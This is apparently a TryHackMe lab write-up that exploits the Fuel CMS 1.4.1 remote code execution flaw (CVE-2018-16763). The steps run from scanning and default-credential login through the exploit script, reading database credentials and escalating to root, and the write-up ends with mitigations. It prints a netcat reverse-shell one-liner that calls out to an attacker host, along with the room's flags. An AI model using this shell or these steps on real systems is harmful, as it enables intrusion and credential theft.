TryHackMe Ignite Room Walkthrough: Exploiting Fuel CMS 1.4.1 RCE
In this walkthrough, I explore the Ignite room on TryHackMe, where I exploit a Remote Code Execution vulnerability in Fuel CMS 1.4.1 (CVE-2018–16763). Learn how the exploit works, how to execute it, and key takeaways to protect against such vulnerabilities.
You can access the TryHackMe Ignite room here: TryHackMe Ignite Room.
In this TryHackMe Ignite room walkthrough, I exploit a Remote Code Execution (RCE) vulnerability in Fuel CMS version 1.4.1 (CVE-2018–16763). The objective was to gain command execution on the target, understand how the exploit works, and identify ways to defend against such vulnerabilities.
Enumeration
The first step was to identify open ports and services running on the target machine. I started with an aggressive port scan:
nmap -p- -T4 -vv 10.10.95.244The nmap scan revealed that port 80 was open and running Apache httpd 2.4.18.
After discovering that port 80 was open, I entered the target’s IP address in the browser. This revealed the Fuel CMS Getting Started page, where the CMS version (1.4.1) was explicitly posted. The page also provided helpful information about installation and configuration directories used for setting up the CMS.
Next, I performed a service enumeration scan to gather more information:
nmap -sC -sV -p80 10.10.95.244
From the results:
- The web service is hosting FUEL CMS.
- The
robots.txtfile contained one disallowed entry:/fuel, which pointed directly to the Fuel CMS login page.
Navigating to the /fuel directory in the browser led to the Fuel CMS login portal.
While I initially thought I lacked valid login credentials, further inspection of the Fuel CMS Getting Started page revealed default credentials displayed at the bottom section of the page:
- Username: admin
- Password: admin
I successfully logged in to the Fuel CMS administrator interface using these credentials.
Once logged in, I was presented with the CMS dashboard and several sections including Pages, Blocks, Assets, Users, and Settings. However, after navigating through the various pages within the CMS, there didn’t appear to be anything immediately useful for further exploitation or gaining additional access.
Vulnerability Discovery
The vulnerable component was Fuel CMS 1.4.1. A quick Google search for vulnerabilities related to this version of Fuel CMS led to a public exploit on Exploit-DB:
👉 Exploit-DB Entry for CVE-2018–16763
The same exploit was available through searchsploit. Running searchsploit fuel cms showed multiple exploits for Fuel CMS 1.4.1, including three Remote Code Execution vulnerabilities.
I imported the exploit code to my local machine using the following command:
searchsploit -m php/webapps/50477.py
Understanding the Exploit
This exploit leverages a vulnerability in Fuel CMS, specifically in the way it processes user input submitted through the filter parameter in the /fuel/pages/select/ endpoint. The application fails to properly sanitize and validate this input, allowing for the injection of arbitrary PHP code.
- Root Cause: Inadequate input validation on the
filterparameter, which results in the application processing unsanitized data. - Security Impact: An attacker can exploit this flaw to perform Remote Code Execution (RCE), allowing them to execute arbitrary system-level commands on the server hosting Fuel CMS.
Exploit Execution
After importing the exploit code locally, I executed it against the target.
python 50477.py -u http://10.10.95.244Upon a successful connection, the exploit opened an interactive shell-like interface. I ran the following commands to confirm remote code execution:
ls
sudo -l
whoami
id
During this phase, I observed some unusual behavior when executing several commands through the exploit’s interface. For example, running commands like sudo -l returning the word system instead of the expected output. This was likely due to the way the exploit leveraged the PHP system() function to execute commands, causing inconsistent or incomplete output responses.
This confirmed command execution as the www-data user.
Post Exploitation
Reflecting back to the CMS homepage, where it was disclosed that the database username and password information could be found inthe fuel/application/config/database.php directory, I navigated to this location on the server to retrieve the credentials.
I accessed the Fuel CMS configuration file located at fuel/application/config/database.php, which contained the database connection information:
cat fuel/application/config/database.php
This file revealed the following database credentials:
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe',
'database' => 'fuel_schema',
With these credentials, an attacker could:
- Access the backend database directly.
- Dump sensitive user data or application data.
- Attempt credential reuse across other services or escalate privileges.
Further enumeration revealed an interesting file: flag.txt located in /home/www-data/. I retrieved the flag using the following commands:
ls /home/www-data
cat /home/www-data/flag.txtThe content of the flag.txt file was:
6470e394cbf6dab6a91682cc8585059b
Additionally, I set up a reverse shell using a named pipe and nc to gain a more stable connection:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.2.119.123 1234 > /tmp/f
Privilege Escalation
After gaining access as the www-data user, I attempted to escalate privileges to the root user. Initially, when trying to run su root, I received a message stating that the command must be executed from a terminal. To resolve this, I spawned a pseudo-terminal using the following command:
python -c 'import pty; pty.spawn("/bin/sh")'
Once I had a proper shell, I retried the su root command. The sudo -l command didn’t provide any additional options for privilege escalation because www-data didn’t have sudo privileges. However, since I previously found database credentials (root / mememe), I attempted to switch users directly with su root.
su root
Password: mememeThis successfully authenticated me as the root user. To confirm, I ran the id command:
idI was now operating as root on the system.
I also retrieved the final root flag from /root/root.txt:
cat /root/root.txt
Flag: b9bbcb33e11b80be759c4e844862482d
Mitigation and Defense
To defend against this type of vulnerability, a combination of patching, configuration hardening, and defensive coding practices is essential:
- Patch Management: Upgrade to the latest version of Fuel CMS (greater than 1.4.1) to ensure known vulnerabilities are patched.
- Input Validation: Sanitize and validate all user inputs rigorously to prevent injection attacks and ensure that data is processed safely.
- Disable Dangerous PHP Functions: Disable potentially dangerous PHP functions such as
eval(),system(), andexec()in yourphp.iniconfiguration when they are not explicitly needed by the application. This reduces the attack surface for remote code execution vulnerabilities. Perform thorough application testing before disabling these functions to avoid breaking legacy functionality. - Least Privilege Principle: Restrict web service permissions to limit impact.
- Web Application Firewall (WAF): Filter malicious requests.
This Ignite room was a great reminder that insecure coding practices and outdated software can expose critical vulnerabilities. Simple input validation failures can lead to full system compromise.
Always patch your systems, limit permissions, and follow secure coding principles.
🙌 Thanks for reading! If you found this walkthrough helpful, follow me for more hands-on cybersecurity content, CTF write-ups, and tips from the field.
🔗 Connect with me: LinkedIn
🛡️ #NotesByNisha | #CyberSecurity | #TryHackMe | #CTFWalkthrough | #BlueTeam #RedTeam
